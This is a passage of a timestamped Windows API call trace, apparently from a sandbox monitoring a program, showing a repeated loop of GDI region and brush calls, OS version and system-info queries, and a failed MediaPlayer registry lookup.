[0017.607] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.607] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.607] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.607] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.607] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6904027d [0017.607] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x73040713 [0017.607] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b11 [0017.607] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b12 [0017.607] CombineRgn (hrgnDst=0x1040b11, hrgnSrc1=0x6904027d, hrgnSrc2=0x73040713, iMode=1) returned 1 [0017.607] CombineRgn (hrgnDst=0x1040b12, hrgnSrc1=0x6904027d, hrgnSrc2=0x73040713, iMode=4) returned 2 [0017.607] CreateSolidBrush (color=0xff) returned 0x2100b10 [0017.607] CreateSolidBrush (color=0xff0000) returned 0x1100b13 [0017.607] DeleteObject (ho=0x1100b13) returned 1 [0017.607] DeleteObject (ho=0x73040713) returned 1 [0017.608] DeleteObject (ho=0x6904027d) returned 1 [0017.608] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.608] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.608] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.608] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.608] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.608] BeginPath (hdc=0x0) returned 0 [0017.608] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.608] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.608] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.608] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.608] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.608] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.608] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.608] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.608] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x74040713 [0017.608] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6a04027d [0017.608] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b14 [0017.608] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b15 [0017.608] CombineRgn (hrgnDst=0x1040b14, hrgnSrc1=0x74040713, hrgnSrc2=0x6a04027d, iMode=1) returned 1 [0017.608] CombineRgn (hrgnDst=0x1040b15, hrgnSrc1=0x74040713, hrgnSrc2=0x6a04027d, iMode=4) returned 2 [0017.608] CreateSolidBrush (color=0xff) returned 0x2100b13 [0017.608] CreateSolidBrush (color=0xff0000) returned 0x1100b16 [0017.608] DeleteObject (ho=0x1100b16) returned 1 [0017.608] DeleteObject (ho=0x6a04027d) returned 1 [0017.608] DeleteObject (ho=0x74040713) returned 1 [0017.609] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.609] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.609] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.609] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.609] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.609] BeginPath (hdc=0x0) returned 0 [0017.609] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.609] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.609] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.609] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.609] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.609] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.609] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.609] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.609] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6b04027d [0017.609] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x75040713 [0017.609] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b17 [0017.609] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b18 [0017.609] CombineRgn (hrgnDst=0x1040b17, hrgnSrc1=0x6b04027d, hrgnSrc2=0x75040713, iMode=1) returned 1 [0017.609] CombineRgn (hrgnDst=0x1040b18, hrgnSrc1=0x6b04027d, hrgnSrc2=0x75040713, iMode=4) returned 2 [0017.609] CreateSolidBrush (color=0xff) returned 0x2100b16 [0017.609] CreateSolidBrush (color=0xff0000) returned 0x1100b19 [0017.609] DeleteObject (ho=0x1100b19) returned 1 [0017.609] DeleteObject (ho=0x75040713) returned 1 [0017.609] DeleteObject (ho=0x6b04027d) returned 1 [0017.609] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.609] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.609] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.609] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.610] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.610] BeginPath (hdc=0x0) returned 0 [0017.610] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.610] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.610] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.610] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.610] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.610] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.610] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.610] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.610] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x76040713 [0017.610] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6c04027d [0017.610] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b1a [0017.610] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b1b [0017.610] CombineRgn (hrgnDst=0x1040b1a, hrgnSrc1=0x76040713, hrgnSrc2=0x6c04027d, iMode=1) returned 1 [0017.610] CombineRgn (hrgnDst=0x1040b1b, hrgnSrc1=0x76040713, hrgnSrc2=0x6c04027d, iMode=4) returned 2 [0017.610] CreateSolidBrush (color=0xff) returned 0x2100b19 [0017.610] CreateSolidBrush (color=0xff0000) returned 0x1100b1c [0017.610] DeleteObject (ho=0x1100b1c) returned 1 [0017.610] DeleteObject (ho=0x6c04027d) returned 1 [0017.610] DeleteObject (ho=0x76040713) returned 1 [0017.610] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.610] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.610] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.610] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.610] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.610] BeginPath (hdc=0x0) returned 0 [0017.610] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.610] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.610] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.610] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.610] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.611] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.611] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.611] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.611] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6d04027d [0017.611] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x77040713 [0017.611] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b1d [0017.611] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b1e [0017.611] CombineRgn (hrgnDst=0x1040b1d, hrgnSrc1=0x6d04027d, hrgnSrc2=0x77040713, iMode=1) returned 1 [0017.611] CombineRgn (hrgnDst=0x1040b1e, hrgnSrc1=0x6d04027d, hrgnSrc2=0x77040713, iMode=4) returned 2 [0017.611] CreateSolidBrush (color=0xff) returned 0x2100b1c [0017.611] CreateSolidBrush (color=0xff0000) returned 0x1100b1f [0017.611] DeleteObject (ho=0x1100b1f) returned 1 [0017.611] DeleteObject (ho=0x77040713) returned 1 [0017.611] DeleteObject (ho=0x6d04027d) returned 1 [0017.611] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.611] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.611] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.611] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.611] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.611] BeginPath (hdc=0x0) returned 0 [0017.611] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.612] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.612] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.612] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.612] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.612] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.612] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.612] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.612] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x78040713 [0017.612] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6e04027d [0017.612] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b20 [0017.612] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b21 [0017.612] CombineRgn (hrgnDst=0x1040b20, hrgnSrc1=0x78040713, hrgnSrc2=0x6e04027d, iMode=1) returned 1 [0017.612] CombineRgn (hrgnDst=0x1040b21, hrgnSrc1=0x78040713, hrgnSrc2=0x6e04027d, iMode=4) returned 2 [0017.612] CreateSolidBrush (color=0xff) returned 0x2100b1f [0017.612] CreateSolidBrush (color=0xff0000) returned 0x1100b22 [0017.612] DeleteObject (ho=0x1100b22) returned 1 [0017.612] DeleteObject (ho=0x6e04027d) returned 1 [0017.612] DeleteObject (ho=0x78040713) returned 1 [0017.612] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.612] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.612] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.612] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.612] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.612] BeginPath (hdc=0x0) returned 0 [0017.612] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.612] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.612] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.612] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.612] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.612] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.613] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.613] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.613] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6f04027d [0017.613] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x79040713 [0017.613] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b23 [0017.613] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b24 [0017.613] CombineRgn (hrgnDst=0x1040b23, hrgnSrc1=0x6f04027d, hrgnSrc2=0x79040713, iMode=1) returned 1 [0017.613] CombineRgn (hrgnDst=0x1040b24, hrgnSrc1=0x6f04027d, hrgnSrc2=0x79040713, iMode=4) returned 2 [0017.613] CreateSolidBrush (color=0xff) returned 0x2100b22 [0017.613] CreateSolidBrush (color=0xff0000) returned 0x1100b25 [0017.613] DeleteObject (ho=0x1100b25) returned 1 [0017.613] DeleteObject (ho=0x79040713) returned 1 [0017.613] DeleteObject (ho=0x6f04027d) returned 1 [0017.613] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.613] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.613] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.613] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.613] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.613] BeginPath (hdc=0x0) returned 0 [0017.613] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.613] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.613] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.613] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.613] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.613] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.613] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.613] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.614] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7a040713 [0017.614] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7004027d [0017.614] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b26 [0017.614] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b27 [0017.614] CombineRgn (hrgnDst=0x1040b26, hrgnSrc1=0x7a040713, hrgnSrc2=0x7004027d, iMode=1) returned 1 [0017.614] CombineRgn (hrgnDst=0x1040b27, hrgnSrc1=0x7a040713, hrgnSrc2=0x7004027d, iMode=4) returned 2 [0017.614] CreateSolidBrush (color=0xff) returned 0x2100b25 [0017.614] CreateSolidBrush (color=0xff0000) returned 0x1100b28 [0017.614] DeleteObject (ho=0x1100b28) returned 1 [0017.614] DeleteObject (ho=0x7004027d) returned 1 [0017.614] DeleteObject (ho=0x7a040713) returned 1 [0017.614] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.614] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.614] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.614] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.614] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.614] BeginPath (hdc=0x0) returned 0 [0017.614] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.614] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.614] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.614] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.614] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.614] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.614] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.614] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.614] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7104027d [0017.614] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7b040713 [0017.614] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b29 [0017.614] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b2a [0017.614] CombineRgn (hrgnDst=0x1040b29, hrgnSrc1=0x7104027d, hrgnSrc2=0x7b040713, iMode=1) returned 1 [0017.614] CombineRgn (hrgnDst=0x1040b2a, hrgnSrc1=0x7104027d, hrgnSrc2=0x7b040713, iMode=4) returned 2 [0017.614] CreateSolidBrush (color=0xff) returned 0x2100b28 [0017.615] CreateSolidBrush (color=0xff0000) returned 0x1100b2b [0017.615] DeleteObject (ho=0x1100b2b) returned 1 [0017.615] DeleteObject (ho=0x7b040713) returned 1 [0017.615] DeleteObject (ho=0x7104027d) returned 1 [0017.615] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.615] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.615] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.615] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.615] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.615] BeginPath (hdc=0x0) returned 0 [0017.615] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.615] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.615] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.615] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.615] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.615] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.615] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.615] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.615] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7c040713 [0017.615] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7204027d [0017.615] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b2c [0017.615] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b2d [0017.615] CombineRgn (hrgnDst=0x1040b2c, hrgnSrc1=0x7c040713, hrgnSrc2=0x7204027d, iMode=1) returned 1 [0017.615] CombineRgn (hrgnDst=0x1040b2d, hrgnSrc1=0x7c040713, hrgnSrc2=0x7204027d, iMode=4) returned 2 [0017.615] CreateSolidBrush 